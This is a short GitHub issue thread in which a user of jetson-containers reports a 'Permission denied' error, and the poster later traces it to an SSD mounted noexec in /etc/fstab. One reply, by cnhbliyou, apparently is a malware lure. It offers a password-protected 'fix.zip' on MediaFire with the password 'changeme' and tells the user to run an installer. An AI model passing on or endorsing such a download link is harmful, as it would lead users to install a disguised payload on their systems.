### ISSUE TITLE
A Newbie Here, having permission issues when run jetson-containers. How do I fix it ?

### ISSUE THREAD

**Issue by r4hul77** [dusty-nv/jetson-containers#604]
As the title said  when I run `jetson-containers` I get `bash: /usr/local/bin/jetson-containers: Permission denied"` but the command works well when I use `bash jetson-containers`.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by r4hul77** [comment]
For people going through the same problem check your `/etc/fstab` you might have mounted the ssd as nonexec.
